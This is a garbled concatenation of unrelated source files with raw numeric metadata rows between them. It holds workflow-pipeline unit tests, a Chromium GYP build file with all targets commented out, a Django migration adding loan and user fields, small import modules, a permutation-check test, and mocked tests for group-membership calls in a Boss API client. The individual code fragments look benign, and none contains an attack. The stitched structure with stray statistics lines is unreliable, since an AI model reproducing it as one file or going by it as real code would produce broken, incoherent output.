        sub_start = EmptyStartEvent()
        sub_act_1 = ServiceActivity(component_code="debug_node")
        sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}")
        sub_end = EmptyEndEvent()

        sub_start.extend(sub_act_1).extend(sub_end)

        sub_pipeline_data = Data()
        sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value")

        start = EmptyStartEvent()
        params = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${constant_1}")})
        subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params)
        end = EmptyEndEvent()

        start.extend(subprocess).extend(end)

        pipeline_data = Data()
        pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1")

        pipeline = self.create_pipeline_and_run(start, data=pipeline_data)

        self.join_or_fail(pipeline)
        self.assert_pipeline_finished(pipeline)
        self.assert_inputs_equals(sub_act_1, "param_1", "value_1")

        self.test_pass()

    def test_ref_constant_using_splice_input(self):
        sub_start = EmptyStartEvent()
        sub_act_1 = ServiceActivity(component_code="debug_node")
        sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}")
        sub_end = EmptyEndEvent()

        sub_start.extend(sub_act_1).extend(sub_end)

        sub_pipeline_data = Data()
        sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.SPLICE, value="default_value")

        start = EmptyStartEvent()
        params = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${constant_1}")})
        subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params)
        end = EmptyEndEvent()

        start.extend(subprocess).extend(end)

        pipeline_data = Data()
        pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1")

        pipeline = self.create_pipeline_and_run(start, data=pipeline_data)

        self.join_or_fail(pipeline)
        self.assert_pipeline_finished(pipeline)
        self.assert_inputs_equals(sub_act_1, "param_1", "value_1")

        self.test_pass()

    def test_ref_constant_using_default_value(self):
        sub_start = EmptyStartEvent()
        sub_act_1 = ServiceActivity(component_code="debug_node")
        sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}")
        sub_end = EmptyEndEvent()

        sub_start.extend(sub_act_1).extend(sub_end)

        sub_pipeline_data = Data()
        sub_pipeline_data.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value")

        start = EmptyStartEvent()
        params = Params()
        subprocess = SubProcess(start=sub_start, data=sub_pipeline_data, params=params)
        end = EmptyEndEvent()

        start.extend(subprocess).extend(end)

        pipeline_data = Data()
        pipeline_data.inputs["${constant_1}"] = Var(type=Var.PLAIN, value="value_1")

        pipeline = self.create_pipeline_and_run(start, data=pipeline_data)

        self.join_or_fail(pipeline)
        self.assert_pipeline_finished(pipeline)
        self.assert_inputs_equals(sub_act_1, "param_1", "default_value")

        self.test_pass()

    def test_nesting_ref_constant(self):
        # subprocess 1
        sub_start_1 = EmptyStartEvent()
        sub_act_1 = ServiceActivity(component_code="debug_node")
        sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${sub_constant_1}")
        sub_end_1 = EmptyEndEvent()

        sub_start_1.extend(sub_act_1).extend(sub_end_1)

        sub_pipeline_data_1 = Data()
        sub_pipeline_data_1.inputs["${sub_constant_1}"] = DataInput(type=Var.PLAIN, value="default_value_1")

        # subprocess 2
        sub_start_2 = EmptyStartEvent()
        params_1 = Params({"${sub_constant_1}": Var(type=Var.SPLICE, value="${sub_constant_2}")})
        subprocess_1 = SubProcess(start=sub_start_1, data=sub_pipeline_data_1, params=params_1)
        sub_end_2 = EmptyEndEvent()

        sub_start_2.extend(subprocess_1).extend(sub_end_2)

        sub_pipeline_data_2 = Data()
        sub_pipeline_data_2.inputs["${sub_constant_2}"] = DataInput(type=Var.PLAIN, value="default_value_2")

        # root flow
        start = EmptyStartEvent()
        params_2 = Params({"${sub_constant_2}": Var(type=Var.SPLICE, value="${constant}")})
        subprocess_2 = SubProcess(start=sub_start_2, data=sub_pipeline_data_2, params=params_2)
        end = EmptyEndEvent()

        start.extend(subprocess_2).extend(end)

        pipeline_data = Data()
        pipeline_data.inputs["${constant}"] = Var(type=Var.PLAIN, value="value_3")

        pipeline = self.create_pipeline_and_run(start, data=pipeline_data)

        self.join_or_fail(pipeline)
        self.assert_pipeline_finished(pipeline)
        self.assert_inputs_equals(sub_act_1, "param_1", "value_3")

        self.test_pass()

    def test_nesting_ref_constant_with_same_key(self):
        # subprocess 1
        sub_start_1 = EmptyStartEvent()
        sub_act_1 = ServiceActivity(component_code="debug_node")
        sub_act_1.component.inputs.param_1 = Var(type=Var.SPLICE, value="${same_key}")
        sub_end_1 = EmptyEndEvent()

        sub_start_1.extend(sub_act_1).extend(sub_end_1)

        sub_pipeline_data_1 = Data()
        sub_pipeline_data_1.inputs["${same_key}"] = DataInput(type=Var.PLAIN, value="default_value_1")

        # subprocess 2
        sub_start_2 = EmptyStartEvent()
        params_1 = Params({"${same_key}": Var(type=Var.SPLICE, value="${same_key}")})
        subprocess_1 = SubProcess(start=sub_start_1, data=sub_pipeline_data_1, params=params_1)
        sub_end_2 = EmptyEndEvent()

        sub_start_2.extend(subprocess_1).extend(sub_end_2)

        sub_pipeline_data_2 = Data()
        sub_pipeline_data_2.inputs["${same_key}"] = DataInput(type=Var.PLAIN, value="default_value_2")

        # root flow
        start = EmptyStartEvent()
        params_2 = Params({"${same_key}": Var(type=Var.SPLICE, value="${constant}")})
        subprocess_2 = SubProcess(start=sub_start_2, data=sub_pipeline_data_2, params=params_2)
        end = EmptyEndEvent()

        start.extend(subprocess_2).extend(end)

        pipeline_data = Data()
        pipeline_data.inputs["${constant}"] = Var(type=Var.PLAIN, value="value_3")

        pipeline = self.create_pipeline_and_run(start, data=pipeline_data)

        self.join_or_fail(pipeline)
        self.assert_pipeline_finished(pipeline)
        self.assert_inputs_equals(sub_act_1, "param_1", "value_3")

        self.test_pass()
37.85
108
0.677675
885
6,813
4.842938
0.068927
0.100793
0.073495
0.062063
0.961036
0.961036
0.961036
0.957769
0.932571
0.924872
0
0.021085
0.199472
6,813
179
109
38.061453
0.76476
0.014384
0
0.836207
0
0
0.100358
0
0
0
0
0
0.086207
1
0.043103
false
0.043103
0.008621
0
0.060345
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
55a28f94b16e58592e0d38cf101b74f3b5923a70
3,745
gyp
Python
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
xzhan96/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
1
2021-01-07T18:51:03.000Z
2021-01-07T18:51:03.000Z
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
emilio/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
null
null
null
ui/file_manager/file_manager/foreground/js/metadata/compiled_resources2.gyp
emilio/chromium.src
1bd0cf3997f947746c0fc5406a2466e7b5f6159e
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
null
null
null
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
  'targets': [
#    {
#      'target_name': 'byte_reader',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'content_metadata_provider',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'content_metadata_provider_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'exif_constants',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'exif_parser',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'exif_parser_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'external_metadata_provider',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'external_metadata_provider_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'file_system_metadata_provider',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'file_system_metadata_provider_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'function_parallel',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'function_sequence',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'id3_parser',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'image_orientation',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'image_orientation_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'image_parsers',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_cache_item',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_cache_item_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_cache_set',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_cache_set_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_dispatcher',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_item',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_model',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_model_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'metadata_parser',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'mpeg_parser',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'multi_metadata_provider',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'multi_metadata_provider_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'new_metadata_provider',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'thumbnail_model',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
#    {
#      'target_name': 'thumbnail_model_unittest',
#      'includes': ['../../../../compile_js2.gypi'],
#    },
  ],
}
28.371212
72
0.488919
302
3,745
5.672185
0.198676
0.180969
0.325744
0.398132
0.880911
0.880911
0.844717
0.730881
0.447169
0.067717
0
0.012414
0.225634
3,745
131
73
28.587786
0.578276
0.925501
0
0
0
0
0.046358
0
0
0
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
8
e9a0991b4e70f5cb254a5f4ba1b45fc29789fcf5
67
py
Python
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
224
2020-01-02T10:46:37.000Z
2022-03-02T13:54:08.000Z
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
16
2020-03-11T09:37:58.000Z
2022-01-26T10:22:08.000Z
plugins/dbnd-test-scenarios/src/dbnd_test_scenarios/test_common/complex_package_structure/complex_package/__init__.py
busunkim96/dbnd
0191fdcd4c4fbd35006f1026d1a55b2abab9097b
[ "Apache-2.0" ]
24
2020-03-24T13:53:50.000Z
2022-03-22T11:55:18.000Z
from .complex_structure_pipeline import complex_structure_pipeline
33.5
66
0.925373
8
67
7.25
0.625
0.551724
0.827586
0
0
0
0
0
0
0
0
0
0.059701
67
1
67
67
0.920635
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
7586b64d4ea47aba49b8b97587fa2a1b132698ab
1,737
py
Python
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
accounts/migrations/0002_business_business_name_loan_amount_loan_borrower_and_more.py
nephsir/daraja
0deb9913ab863eadfc1a27f5e292b220f86a1bb7
[ "MIT" ]
null
null
null
# Generated by Django 4.0.2 on 2022-02-21 05:52

from django.db import migrations, models
import django.utils.timezone


class Migration(migrations.Migration):

    dependencies = [
        ('accounts', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='business',
            name='business_name',
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='loan',
            name='amount',
            field=models.DecimalField(decimal_places=2, default=0, max_digits=20),
        ),
        migrations.AddField(
            model_name='loan',
            name='borrower',
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='loan',
            name='issuer',
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='loan',
            name='loan_ref',
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='user',
            name='loan_limit',
            field=models.DecimalField(decimal_places=2, default=0, max_digits=20),
        ),
        migrations.AddField(
            model_name='user',
            name='phone',
            field=models.CharField(default=django.utils.timezone.now, max_length=100),
            preserve_default=False,
        ),
    ]
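The `default=django.utils.timezone.now, preserve_default=False` pairs are Django's "one-off default" pattern: the default only back-fills existing rows during the migration and is dropped from the final field. A minimal sketch of the model fields these operations imply; the `Loan` class below is a hypothetical reconstruction, not taken from the migration.

# Hypothetical model sketch implied by the AddField operations above.
from django.db import models

class Loan(models.Model):
    # default=0 is kept because preserve_default was not set to False
    amount = models.DecimalField(decimal_places=2, default=0, max_digits=20)
    # no default in the final field: the one-off default was discarded
    borrower = models.CharField(max_length=100)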
31.581818
86
0.582038
175
1,737
5.634286
0.297143
0.127789
0.163286
0.191684
0.737323
0.737323
0.712982
0.712982
0.712982
0.712982
0
0.034768
0.304548
1,737
54
87
32.166667
0.781457
0.025907
0
0.666667
1
0
0.063905
0
0
0
0
0
0
1
0
false
0
0.041667
0
0.104167
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
75980aff25d7c643bd7ef84609294b98bcbe2552
148
py
Python
graphgallery/nn/__init__.py
Sharpiless/GraphGallery
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
[ "MIT" ]
1
2020-11-22T10:14:58.000Z
2020-11-22T10:14:58.000Z
graphgallery/nn/__init__.py
mengliu1998/GraphGallery
025ac09e883f3e1e1b02000e086830c935884a6e
[ "MIT" ]
null
null
null
graphgallery/nn/__init__.py
mengliu1998/GraphGallery
025ac09e883f3e1e1b02000e086830c935884a6e
[ "MIT" ]
1
2020-11-22T10:14:59.000Z
2020-11-22T10:14:59.000Z
from graphgallery.nn.layers import *
from graphgallery.nn.models import *
from graphgallery.nn.functions import *
from graphgallery.nn.init import *
37
39
0.817568
20
148
6.05
0.4
0.528926
0.595041
0.595041
0
0
0
0
0
0
0
0
0.101351
148
4
40
37
0.909774
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
75b860e992c6da08ab0fe4c3740cf7604e659306
191
py
Python
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
null
null
null
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
2
2021-03-25T21:32:16.000Z
2021-07-19T11:11:15.000Z
lessons/04/perm_check/test_challenge.py
jimlawton/codility
b286db80c7cfa6722b78c7eb8992e1a5934db8a0
[ "Apache-2.0" ]
null
null
null
from challenge import solution


def test_challenge():
    assert solution([4]) == 0
    assert solution([1]) == 1
    assert solution([4, 1, 3, 2]) == 1
    assert solution([4, 1, 3]) == 0
19.1
38
0.591623
28
191
4
0.428571
0.5
0.401786
0.285714
0.321429
0.321429
0
0
0
0
0
0.089655
0.240838
191
9
39
21.222222
0.682759
0
0
0
0
0
0
0
0
0
0
0
0.666667
1
0.166667
true
0
0.166667
0
0.333333
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
1
0
0
0
0
0
0
7
f930c5c638991bd332a169332c3a92818a282af0
14,768
py
Python
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
15
2017-01-13T23:06:38.000Z
2021-09-22T11:33:02.000Z
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
49
2017-04-26T13:21:26.000Z
2021-11-16T14:03:58.000Z
intern/service/boss/v1/tests/test_group.py
neurodata-dev/intern
8a685dda17f6bb9420395f80ce012d8b3a04e0dc
[ "Apache-2.0" ]
18
2017-02-17T23:12:37.000Z
2021-09-27T08:53:32.000Z
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from intern.service.boss.v1.project import ProjectService_1 from intern.resource.boss.resource import * from requests import PreparedRequest, Response, Session, HTTPError import unittest from mock import patch class TestGroup(unittest.TestCase): def setUp(self): self.prj = ProjectService_1() @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_list_groups_success(self, mock_session, mock_resp): expected = ['g1', 'g2'] mock_resp.status_code = 200 mock_resp.json.return_value = { 'groups': expected } mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = mock_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.list_groups( None, url_prefix, auth, mock_session, send_opts) self.assertEqual(expected, actual) @patch('requests.Session', autospec=True) def test_list_groups_failure(self, mock_session): fake_resp = Response() fake_resp.status_code = 403 mock_session.prepare_request.return_value = PreparedRequest() mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.list_groups(None, url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_create_group_success(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 201 mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} self.prj.create_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Session', autospec=True) def test_create_group_failure(self, mock_session): mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 403 mock_session.send.return_value = fake_resp url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} with self.assertRaises(HTTPError): self.prj.create_group( 'mygroup', url_prefix, auth, mock_session, send_opts) @patch('requests.Response', autospec=True) @patch('requests.Session', autospec=True) def test_get_group_success(self, mock_session, mock_resp): grp_name = 'mygroup' mock_session.prepare_request.return_value = PreparedRequest() mock_resp.status_code = 200 mock_resp.json.return_value = True mock_session.send.return_value = mock_resp user = None url_prefix = 'https://api.theboss.io' auth = 'mytoken' send_opts = {} actual = self.prj.get_group( grp_name, user, url_prefix, auth, mock_session, send_opts) self.assertTrue(actual) @patch('requests.Session', autospec=True) def test_get_group_failure(self, mock_session): grp_name = 'mygroup' mock_session.prepare_request.return_value = PreparedRequest() fake_resp = Response() fake_resp.status_code = 404 mock_session.send.return_value = fake_resp user = None url_prefix = 'https://api.theboss.io' auth = 
'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.get_group(
                grp_name, user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_success(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 204
        mock_session.send.return_value = fake_resp
        user = None
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.prj.delete_group(
            'mygroup', url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.send.return_value = fake_resp
        user = None
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.delete_group(
                'mygroup', url_prefix, auth, mock_session, send_opts)

    @patch('requests.Response', autospec=True)
    @patch('requests.Session', autospec=True)
    def test_list_group_members_success(self, mock_session, mock_resp):
        expected = ['john', 'mary']
        mock_resp.status_code = 200
        mock_resp.json.return_value = {'members': expected}
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_session.send.return_value = mock_resp
        group = 'fire'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        actual = self.prj.list_group_members(
            group, url_prefix, auth, mock_session, send_opts)
        self.assertEqual(expected, actual)

    @patch('requests.Session', autospec=True)
    def test_list_group_members_failure(self, mock_session):
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_session.send.return_value = fake_resp
        group = 'fire'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.list_group_members(
                group, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_add_group_member_success(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 204
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.prj.add_group_member(
            'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_add_group_member_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.add_group_member(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Response', autospec=True)
    @patch('requests.Session', autospec=True)
    def test_get_is_group_member_success(self, mock_session, mock_resp):
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_resp.status_code = 200
        mock_resp.json.return_value = {'result': True}
        mock_session.send.return_value = mock_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.assertTrue(self.prj.get_is_group_member(
            'mygroup', user, url_prefix, auth, mock_session, send_opts))

    @patch('requests.Session', autospec=True)
    def test_get_is_group_member_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 404
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.get_is_group_member(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_member_success(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 204
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.prj.delete_group_member(
            'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_member_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.delete_group_member(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Response', autospec=True)
    @patch('requests.Session', autospec=True)
    def test_list_group_maintainers_success(self, mock_session, mock_resp):
        expected = ['john', 'mary']
        mock_resp.status_code = 200
        mock_resp.json.return_value = {'maintainers': expected}
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_session.send.return_value = mock_resp
        group = 'fire'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        actual = self.prj.list_group_maintainers(
            group, url_prefix, auth, mock_session, send_opts)
        self.assertEqual(expected, actual)

    @patch('requests.Session', autospec=True)
    def test_list_group_maintainers_failure(self, mock_session):
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_session.send.return_value = fake_resp
        group = 'fire'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.list_group_maintainers(
                group, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_add_group_maintainer_success(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 204
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.prj.add_group_maintainer(
            'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_add_group_maintainer_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.add_group_maintainer(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Response', autospec=True)
    @patch('requests.Session', autospec=True)
    def test_get_is_group_maintainer_success(self, mock_session, mock_resp):
        mock_session.prepare_request.return_value = PreparedRequest()
        mock_resp.status_code = 200
        mock_resp.json.return_value = {'result': True}
        mock_session.send.return_value = mock_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.assertTrue(self.prj.get_is_group_maintainer(
            'mygroup', user, url_prefix, auth, mock_session, send_opts))

    @patch('requests.Session', autospec=True)
    def test_get_is_group_maintainer_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 404
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.get_is_group_maintainer(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_maintainer_success(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 204
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        self.prj.delete_group_maintainer(
            'mygroup', user, url_prefix, auth, mock_session, send_opts)

    @patch('requests.Session', autospec=True)
    def test_delete_group_maintainer_failure(self, mock_session):
        mock_session.prepare_request.return_value = PreparedRequest()
        fake_resp = Response()
        fake_resp.status_code = 403
        mock_session.send.return_value = fake_resp
        user = 'you'
        url_prefix = 'https://api.theboss.io'
        auth = 'mytoken'
        send_opts = {}
        with self.assertRaises(HTTPError):
            self.prj.delete_group_maintainer(
                'mygroup', user, url_prefix, auth, mock_session, send_opts)


if __name__ == '__main__':
    unittest.main()
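# --- Illustrative sketch, not part of the original suite. Every test above
# follows one mocking pattern: build a real requests.Response, set the status
# code under test, and have a mocked Session return it from send(). A minimal
# standalone version of that pattern, assuming only the `requests` package
# and the standard library, is kept commented out so it cannot interfere
# with test discovery:
#
#     from unittest.mock import MagicMock
#     from requests import PreparedRequest, Response
#
#     mock_session = MagicMock()
#     mock_session.prepare_request.return_value = PreparedRequest()
#     fake_resp = Response()
#     fake_resp.status_code = 204          # status code under test
#     mock_session.send.return_value = fake_resp
#     assert mock_session.send(PreparedRequest()).status_code == 204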
35.585542
81
0.655878
1,752
14,768
5.231735
0.085616
0.115208
0.078551
0.073314
0.914685
0.912285
0.909012
0.904866
0.903775
0.893083
0
0.007616
0.244244
14,768
414
82
